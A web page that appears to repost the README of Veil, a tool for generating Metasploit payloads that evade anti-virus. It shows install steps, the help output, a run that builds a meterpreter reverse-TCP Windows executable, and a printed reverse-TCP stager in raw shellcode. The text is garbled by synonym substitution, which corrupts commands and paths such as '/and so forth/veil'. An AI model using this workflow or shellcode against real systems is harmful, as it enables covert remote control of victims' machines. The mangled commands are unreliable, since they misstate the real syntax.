Veil – Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

0
4
Veil - Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a instrument designed to generate metasploit payloads that bypass widespread anti-virus options.
Veil is present beneath assist by @ChrisTruncer

Software Requirements:
The following OSs are formally supported:

  • Debian 8+
  • Kali Linux Rolling 2018.1+

The following OSs are seemingly in a position to run Veil:

  • Arch Linux
  • BlackArch Linux
  • Deepin 15+
  • Elementary
  • Fedora 22+
  • Linux Mint
  • Parrot Security
  • Ubuntu 15.10+

Setup

Kali’s Quick Install

apt -y set up veil
/usr/share/veil/config/setup.sh --force --silent

Git’s Quick Install
NOTE:

  • Installation have to be carried out with superuser privileges. If you aren’t utilizing the basis account (as default with Kali Linux), prepend instructions with sudo or change to the basis consumer earlier than starting.
  • Your package deal supervisor could also be totally different to apt.
sudo apt-get -y set up git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

./config/setup.sh // Setup Files
This file is answerable for putting in all of the dependences of Veil. This consists of all of the WINE atmosphere, for the Windows aspect of issues. It will set up all the required Linux packages and GoLang, in addition to Python, Ruby and AutoIT for Windows. In addition, it should additionally run ./config/replace-config.py in your atmosphere.
It consists of two non-obligatory flags, --force and --silent:

--force ~ If one thing goes fallacious, it will overwrite detecting any earlier installs. Useful when there's a setup package deal replace.
--silent ~ This will carry out an unattended set up of all the pieces, as it should automate all of the steps, so there isn't a interplay for the consumer.

This may be ran both by doing: ./Veil.py --setup OR ./config/setup.sh --force.

./config/replace-config.py // Regenerating Configuration file
This will generate the output file for /and so forth/veil/settings.py. Most of the time it is not going to must be rebuilt however in some instances you is likely to be prompted to take action (akin to a serious Veil replace).
It is essential that you’re within the ./config/ listing earlier than executing replace-config.py. If you aren’t, /and so forth/veil/settings.py will likely be incorrect and once you launch Veil you will notice the next:

    Main Menu

            Zero payloads loaded

Don’t panic. Run both: ./Veil.py --config OR cd ./config/; ./replace-config.py.

Py2Exe
NOTE: Using Py2Exe is advisable over PyInstaller (because it has a decrease detection fee).
MANUALLY Install on a Windows Computer (as this is not carried out by Veil’s setup):

Example Usage
Veil’s Main Menu:

$ ./Veil.py
===============================================================================
                             Veil | [Version]: 3.1.6
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

  2 instruments loaded

Available Tools:

  1)  Evasion
  2)  Ordnance

Available Commands:

  exit      Completely exit Veil
  information      Information on a particular instrument
  listing      List accessible instruments
  choices     Show Veil configuration
  replace      Update Veil
  use     Use a particular instrument

Veil>:

Help

$ ./Veil.py --help
utilization: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]
               [--version] [--ip IP] [--port PORT] [--list-payloads]
               [-p [PAYLOAD]] [-o OUTPUT-NAME]
               [-c [OPTION=value [OPTION=value ...]]]
               [--msfoptions [OPTION=value [OPTION=value ...]]] [--msfvenom ]
               [--compiler pyinstaller] [--clean] [--ordnance-payload PAYLOAD]
               [--list-encoders] [-e ENCODER] [-b x00x0a..] [--print-stats]

Veil is a framework containing a number of instruments.

[*] Veil Options:
  --list-instruments          List Veil's instruments
  -t TOOL, --tool TOOL  Specify Veil instrument to make use of (Evasion, Ordnance and so forth.)
  --update              Update the Veil framework
  --setup               Run the Veil framework setup file & regenerate the
                        configuration
  --config              Regenerate the Veil framework configuration file
  --version             Displays model and quits

[*] Callback Settings:
  --ip IP, --domain IP  IP deal with to attach again to
  --port PORT           Port quantity to connect with

[*] Payload Settings:
  --list-payloads       Lists all accessible payloads for that instrument

[*] Veil-Evasion Options:
  -p [PAYLOAD]          Payload to generate
  -o OUTPUT-NAME        Output file base identify for supply and compiled binaries
  -c [OPTION=value [OPTION=value ...]]
                        Custom payload module choices
  --msfoptions [OPTION=value [OPTION=value ...]]
                        Options for the desired metasploit payload
  --msfvenom []         Metasploit shellcode to generate (e.g.
                        home windows/meterpreter/reverse_tcp and so forth.)
  --compiler pyinstaller
                        Compiler possibility for payload (at present solely wanted for
                        Python)
  --clean               Clean out payload folders

[*] Veil-Ordnance Shellcode Options:
  --ordnance-payload PAYLOAD
                        Payload kind (bind_tcp, rev_tcp, and so forth.)

[*] Veil-Ordnance Encoder Options:
  --list-encoders       Lists all accessible encoders
  -e ENCODER, --encoder ENCODER
                        Name of shellcode encoder to make use of
  -b x00x0a.., --bad-chars x00x0a..
                        Bad characters to keep away from
  --print-stats         Print details about the encoded shellcode
$

Veil Evasion CLI

$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

runtime/inner/sys
runtime/inner/atomic
runtime
errors
inner/race
sync/atomic
math
sync
io
unicode/utf8
inner/syscall/home windows/sysdll
unicode/utf16
syscall
strconv
mirror
encoding/binary
command-line-arguments
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: go
 [*] Payload Module: go/meterpreter/rev_tcp
 [*] Executable written to: /var/lib/veil/output/compiled/payload.exe
 [*] Source code written to: /var/lib/veil/output/supply/payload.go
 [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc
$
$ file /var/lib/veil/output/compiled/payload.exe
/var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to exterior PDB), for MS Windows
$

Veil Ordnance CLI

$ ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 127.0.0.1 --port 4444
===============================================================================
                                   Veil-Ordnance
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Payload Name: Reverse TCP Stager (Stage 1)
 [*] IP Address: 127.0.0.1
 [*] Port: 4444
 [*] Shellcode Size: 287

xfcxe8x86x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx8bx4cx10x78xe3x4ax01xd1x51x8bx59x20x01xd3x8bx49x18xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx89x5dx68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x97x6ax09x68x7fx00x00x01x68x02x00x11x5cx89xe6x6ax10x56x57x68x99xa5x74x61xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0xb5xa2x56xffxd5x6ax00x6ax04x56x57x68x02xd9xc8x5fxffxd5x8bx36x6ax40x68x00x10x00x00x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9xc8x5fxffxd5x01xc3x29xc6x85xf6x75xecxc3
$

MoreTip.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.